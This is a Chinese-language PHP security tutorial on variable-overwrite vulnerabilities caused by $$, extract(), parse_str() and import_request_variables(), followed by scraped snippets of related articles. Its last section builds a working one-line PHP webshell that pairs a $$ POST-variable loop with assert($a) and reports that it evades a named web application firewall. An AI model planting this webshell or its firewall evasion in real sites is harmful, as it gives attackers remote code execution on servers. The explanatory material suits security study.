变量覆盖漏洞学习及在webshell中的运用

一、发生条件:

函数使用不当($$、extract()、parse_str()、import_request_variables()等)
开启全局变量

二、基础了解:

1.$$定义

$$代表可变变量,就是说,一个变量的变量名可以动态的设置和使用。

举个简单例子:

变量a被定义成了字符串hello 而变量$a被定于成了字符串world!
但同时$a本身也是个变量
$$a就可以代表两个含义$($a)和$(hello) 两个变量
此时输出的结果如图:

2.extract()定义

extract()可以从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值
语法结构:extract(array,extract_rules,prefix)
i.array为必选参数(此参数必须为数组型数据)
ii.extract_rules为可选参数,可选的值有:
● EXTR_OVERWRITE - 默认。如果有冲突,则覆盖已有的变量。
● EXTR_SKIP - 如果有冲突,不覆盖已有的变量。
● EXTR_PREFIX_SAME - 如果有冲突,在变量名前加上前缀 prefix。
● EXTR_PREFIX_ALL - 给所有变量名加上前缀 prefix。
● EXTR_PREFIX_INVALID - 仅在不合法或数字变量名前加上前缀 prefix。
● EXTR_IF_EXISTS - 仅在当前符号表中已有同名变量时,覆盖它们的值。其它的都不处理。
● EXTR_PREFIX_IF_EXISTS - 仅在当前符号表中已有同名变量时,建立附加了前缀的变量名,其它的都不处理。
● EXTR_REFS - 将变量作为引用提取。导入的变量仍然引用了数组参数的值。
iii.prefix为可选参数(此参数暂不解释)
举个例子:

在开头我们定义了一个数组d
然后我们使用extract()函数并将array参数填写为数组d
此时数组d中的键名将当做新的变量名来创建一个新的变量,而新的变量的值即为在数组中对应的值。(注意如果之前有声明过同一个变量,那么该变量将被覆盖。如果之后才声明将不会出现变量覆盖的现象)
此时输出结果为:

可以看到我们之前并未声明过a、b、c变量,但是仍可输出。

3.parse_str()定义:

把查询字符串解析到变量中
语法:parse_str(string,array)
string为必选参数
array为可选参数
举个例子

可以看到此函数将name和age初始化成了变量,且值为等号右边的值
当array参数存在时:

4.import_request_varibles()定义
将 GET/POST/Cookie 变量导入到全局作用域中
此函数相当于开启全局变量注册
语法import_request_variables(string $types ,string $prefix )
第一个参数为必选
第二个参数为可选
例子:
import_request_variables("GPC")
使用此方法即可开启对_POST、_GET、_COOKIE的全局变量注册
当第二个参数存在时将会加上一个前缀

三、经典案例

1.经典$$变量覆盖

foreach(array('_COOKIE','_POST','_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $$_key = addslashes($_value);
    }

这是一段非常经典的$$注册变量导致的变量覆盖代码,很多应用上都出现过
可以看出$_key为COOKIE POST GET中的参数
比如提交?a=1 则$_key的值为a
而下面的$$_key则会有$a的意思,结合起来就变成了$a = addslashes($_value)
这样便会覆盖原有的变量a的值
我们来运行一下:

可以看到变量a被我们覆盖掉了

2.部分cms变量覆盖案例:

MetInfo全局变量覆盖另类突破防注入
http://www.weixianmanbu.com/article/84.html
齐博CMS变量覆盖导致sql注入漏洞
http://bobao.360.cn/learning/detail/291.html
Destoon 20140530最新版超全局变量覆盖导致的安全问题
http://0day5.com/archives/1855/

四、变量覆盖玩出新花样之一句话木马bypass某狗

经过我们简单的测试,我们可以了解到:当我们使用assert函数时,如果函数的参数是可控,那么某狗拦截。例如:assert($_POST[a])或者$a=$_POST[c];assert($a)这些都是拦截

但是如果我们只有assert($a)这一句时,我们发现他就不会进行拦截了

这就值得我们思考了,为什么这样不会拦截呢?
我认为应该是某狗觉得这个变量a是不可控的,所以就认为这不是木马
那如果这时我们在联系一下变量覆盖漏洞呢?
在这里我选用了上面的案例代码

foreach(array('_COOKIE','_POST','_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $$_key = addslashes($_value);
    }
}

把addslashes()删掉 然后把代码精简下

foreach(array('_POST') as $_r){foreach($$_r as $_k => $_v) {$$_k = $_v;}}

最终代码为

<?php foreach(array('_POST') as $_r){foreach($$_r as $_k => $_v) {$$_k = $_v;}};assert($a);?>

成功bypass

原文地址:https://www.cnblogs.com/yunen/p/10586697.html

时间: 2024-08-29 18:33:30

变量覆盖漏洞学习及在webshell中的运用的相关文章

7. 由一道ctf学习变量覆盖漏洞

0×00 背景 近期在研究学习变量覆盖漏洞的问题,于是就把之前学习的和近期看到的CTF题目中有关变量覆盖的题目结合下进一步研究. 通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞.经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等. 本篇收集了几个CTF中的题目作为例子,对$$,extract(),parse_str()的问题进行总结. 0×

关于METINFO5.3漏洞引发的变量覆盖漏洞

一.$$引起的变量覆盖漏洞, 1.Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2.$_200,$_403 定义两个参数,以及参数值.3.判断访问页面的方法是否为post方法和有没有参数flag.4.再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值.5.还有一个if判断语句,判断用post方法传输的数据是不是和$flag的值相同,如果相同,输出flag.6.最后输出$_200的

【代码审计】变量覆盖漏洞详解

一.漏洞介绍 变量覆盖指的是用我们自定义的参数值替换程序原有的变量值,一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击 二.漏洞函数 变量覆盖漏洞大多数由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract(),parse_str()和import_request_variables() 1.extract() 目前最常见的就是这个函数,使用频率最高,导致的漏洞也最多  extract(array,extract_rules,prefix)  参数 描述 array 必需.规定要

php之变量覆盖漏洞讲解

1.变量没有初始化的问题(1): wooyun连接1:[link href="WooYun: PHPCMS V9 member表内容随意修改漏洞"]tenzy[/link] $updateinfo['password'] = $newpassword;里面的数组没有初始化类似这样的赋值,我们在挖洞的时候搜索类似updateinfo这样的关键字看看 是否初始化,如果没有...且register_global=On支持 可以提交 updateinfo[amount]这样的数组随意修改自己的

变量 覆盖漏洞----$$

变量覆盖漏洞经常引发变量覆盖漏洞的函数有:extract(),parsestr()和importrequestvariables()和$$(可变变量) $$可变变量引起的变量覆盖漏洞一.我们先来查看源代码进行分析1.Include 调用了flag.php文件2.$_200,$403 定义两个参数,以及参数值.3.接着是两个判断语句,判断访问页面的方法是否为post方法和有没有参数flag.4.再接着两个foreach函数遍历数组函数,这里就是把我们用get方法传输的数据当做数组进行遍历,并将遍历

变量覆盖漏洞----extract()函数

Extract()函数引起的变量覆盖漏洞 该函数使用数组键名作为变量名,使用数组键值作为变量值.但是当变量中有同名的元素时,该函数默认将原有的值给覆盖掉.这就造成了变量覆盖漏洞. 一.我们来查看一串代码:1.文件将get方法传输进来的值通过extrace()函数处理.2.通过两个if语句分别判断是否存在gift变量,和变量gift的值和变量content的值是否相等.变量content的值是通过读取变量test的值获取到的.如果两个变量相等输出flag.如果不相等,输出错误. 二.但是我们并不知

齐博CMS变量覆盖漏洞exp

 漏洞的具体分析在 http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp. 利用步骤如下: (1)首先访问/member下面的"评论管理"功能,抓包 (2)在http request中构造一个attachment,如下: POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1 Host: 127.0.0.

php代码审计之变量覆盖

变量覆盖一般由这四个函数引起 <?php $b=3; $a = array('b' => '1' ); extract($a,EXTR_OVERWRITE); print_r($b); //extract 有三种形式可能导致变量覆盖,第一种是第二个参数为EXTR_OVERWRITE,他表示如果有冲突,覆盖原有的变量.第二种情况是只传入第一个参数,默认为EXTR_OVERWRITE模式,第三种是第二个参数为EXTR_IF_EXISTS,他表示在当前符号表中已有同名变量时,覆盖它们的值,其他的都不

CTF-代码审计(1)——parse_str()变量覆盖

题目连接:http://222.18.158.226:7000/iscc.php 考点:parse_str()变量覆盖 代码: PHP知识点: 1.parse_url() 参照网址:https://www.php.net/manual/zh/function.parse-url.php 2.$_SERVER[] 参考网址:https://php.net/manual/zh/reserved.variables.server.php 3.parse_str() 参考网址:http://www.w3